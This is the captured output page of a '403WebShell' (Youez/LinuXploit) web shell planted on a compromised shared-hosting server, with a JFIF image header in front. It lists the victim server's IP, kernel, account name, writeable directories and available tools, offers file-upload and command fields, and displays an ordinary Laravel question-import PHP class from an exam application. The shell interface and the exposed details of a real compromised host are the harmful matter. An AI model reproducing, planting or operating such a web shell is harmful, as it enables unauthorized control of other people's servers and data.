����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 3.15.38.243
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/cbt.bofirm.com/app/Imports/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/cbt.bofirm.com/app/Imports/QuestionsImport.php
<?php
/**
 * File name: QuestionsImport.php
 * Last modified: 14/07/21, 10:01 PM
 * Author: NearCraft - https://codecanyon.net/user/nearcraft
 * Copyright (c) 2021
 */

namespace App\Imports;

use App\Models\Question;
use Illuminate\Support\Str;
use Maatwebsite\Excel\Concerns\Importable;
use Maatwebsite\Excel\Concerns\ToModel;
use Maatwebsite\Excel\Concerns\WithBatchInserts;
use Maatwebsite\Excel\Concerns\WithChunkReading;
use Maatwebsite\Excel\Concerns\WithHeadingRow;
use Maatwebsite\Excel\Concerns\WithValidation;

class QuestionsImport implements ToModel, WithHeadingRow, WithBatchInserts, WithChunkReading, WithValidation
{
    use Importable;

    private $skill;
    private $rows = 0;
    private $questionTypes;
    private $difficultyLevels;

    public function __construct($questionTypes, $difficultyLevels, $skill)
    {
        $this->skill = $skill;
        $this->questionTypes = $questionTypes;
        $this->difficultyLevels = $difficultyLevels;
    }

    /**
     * Import questions from excel
     *
     * @param array $row
     * @return Question
     */
    public function model(array $row)
    {
        ++$this->rows;
        $this->qType = $row['question_type'];

        return new Question([
            'question' => $row['question'],
            'code' => 'que_'.Str::random(11),
            'question_type_id' => $this->questionTypes[$row['question_type']],
            'skill_id' => $this->skill,
            'options' => formatImportOptionsProperty([
                    $row['option1'],
                    $row['option2'],
                    $row['option3'],
                    $row['option4'],
                    $row['option5']
                ], $row['question_type']),
            'correct_answer' => formatImportAnswerProperty($row['correct_answer'], $row['question_type'], $row['question']),
            'default_marks' => $row['default_marks'],
            'default_time' => $row['default_time_to_solve'],
            'difficulty_level_id' => $this->difficultyLevels[$row['difficulty_level']],
            'hint' => $row['hint'],
            'solution' => $row['solution'],
        ]);
    }

    public function rules(): array
    {
        return [
            'question' => ['required'],
            'question_type' => ['required'],
            'default_marks' => ['required'],
            'default_time_to_solve' => ['required'],
            'difficulty_level' => ['required']
        ];
    }

    public function batchSize(): int
    {
        return 100;
    }

    public function chunkSize(): int
    {
        return 100;
    }

    public function getRowCount(): int
    {
        return $this->rows;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit